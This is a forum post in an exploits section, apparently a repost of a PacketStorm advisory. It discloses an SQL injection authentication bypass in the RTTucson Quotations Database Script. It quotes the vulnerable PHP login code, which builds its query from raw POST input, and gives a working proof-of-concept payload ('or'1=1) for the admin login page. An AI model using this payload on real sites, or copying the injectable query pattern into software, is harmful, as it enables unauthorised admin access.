Jump to content
Praetorian503

RTTucson Quotations Database Authentication Bypass

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

RTTucson Quotations Database Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script: http://www.rttucson.com/files.html

# Bugs found /quotations/admin/include/login.php
---------------------------
36 if ($_POST['submit']) {
37
38 $Username = $_POST['Username'];
39 $Password = md5($_POST['Password']);
40
41 $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'";
42 $result = mysql_query($query) or die ( mysql_error() );
---------------------------

Proof of Concept

  http://bastardlabs/[path]/admin/include/login.php
  Username: 'or'1=1
  Password: cr4wl3r

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...